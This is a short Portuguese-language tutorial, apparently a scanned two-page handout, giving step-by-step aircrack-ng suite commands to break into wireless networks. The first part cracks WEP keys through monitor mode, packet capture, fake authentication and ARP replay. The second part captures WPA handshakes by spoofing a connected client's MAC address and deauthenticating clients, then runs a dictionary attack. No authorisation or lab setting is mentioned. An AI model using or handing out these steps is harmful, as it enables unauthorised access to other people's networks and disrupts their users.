Você está na página 1de 2

aircrack

GRUPO 1:

I - Abrir Linux, depois abrir a linha de comandos SHELL no icom na barra de tarrefas do canto inferior
esquerdo:
II - Comandos para verificar a inteterface (placa de rede wireless):
#iwconfig

Quando aparecer as interfaces escolher a interface wireless. Pode ter o nome de WLAN0, WLAN1, ETH0,
ATH0, RAUSB0,...

1 - Iniciar a interface para poder começar a capturar rede:


#airmon-ng start rausb0
(Repare que neste caso a interface de rede chama-se rausb0)

2 - Verificar as redes activas:


#airodump-ng rausb0

Quando ver quais as redes preferidas fazer CTR+C para parar e copiar o endereço MAC_AP (BSSID).
#airodump-ng -w out -c nº_canal --bssid MAC_AP rausb0
---------------------------------------------------------------------------------------------------
3 - Abrir novo shell para autenticar:
#aireplay-ng -e nome_rede -1 0 -b MAC_AP -h MAC_Cliente rausb0
Nota: MAC_Cliente pode ser um mac de PC ou mac falso (exemplo 00:11:22:33:44:55). Nome de rede é a mesma
que SSID. Por exemplo: ThomsonD569

a) Se autenticação for sucessefull, repitir o mesmo comando e alterar em vez de "-1 0" deve-se colocar somente
"-3" para mandar pacotes ARP e começar a capturar dados que contém chaves:
#aireplay-ng -e nome_rede -3 -b MAC_AP -h MAC_Cliente rausb0

b) Se autenticação não for efectuada com sucesso inserir o seguinte comando:


#aireplay-ng -e nome_rede -2 -b MAC_AP -h MAC_Cliente -n 100 -p 0841 -C ff:ff:ff:ff:ff:ff rausb0
depois de efectuar este comando vai esperar os pacotes vão sendo lidos e depois vai dar uma mensagem e
escreves: yes

-------------------------------------------------------------------
4 - Abrir novo shell para PROCURAR CHAVES:

#aircrack-ng -0 out-01.cap

esperar a chave vai ser procurada e quando enconterado é apresentado KEY FOUND no ecrã a cor vermelho.
Copia a chave e guarda no computador ou numa folha de papel.
///////////////////////////////////////////////////////////////////////////////////////

GRUPO 2

No caso de WPA:
Até passo 2 é tudo igual.
Neste caso não precisa de se autenticar, por isso só precisarmor de ver um cliente ligado ao BSSID da rede que
precisamos capturar; Copiar a o endereço mac deste cliente e trocar o mac do nosso PC igual ao outro MAC.
1 - Para trocar o endereço MAC do cliente primeiro tem que parar a interface de rede:
a) Parar interface de rede:
#airmon-ng stop rausb0
#ifconfig rausb0 down
1ágina p
aircrack

b)Alterar endereço MAC:


#macchanger --mac 00:11:22:33:44:55 rausb0
Repare que neste caso o cliente ligado á rede tem mac=00:11:22:33:44:55 e a interface de rede é rausb0

2- Depois destas alterações voltar a repitir os passos 1 e 2 do grupo 1.

3 - Dpois abrir novo shell para apanhar sintese de password "handshack" (password protegido)
Desautenticar palavra passe protegido no cliente
#aireplay-ng -e nome_rede -0 5 -a MAC_AP rausb0
#aireplay-ng -e nome_rede -0 5 -a MAC_AP -c MAC_Cliente rausb0

Depois deste comandos verificar no primeiro shell quando aparecer a mensagem "1 handshack captured ...", pode
parar a captura com o comando "control + C" e procurar a chave no dicionario usando também o ficheiro de
captura que neste caso tem o nome de out-01.cap. Comando a utilizar:
#aircrack-ng -0 -w nome_dicionario out-01.cap

BOA SORTE...................

Luís Brito

2ágina p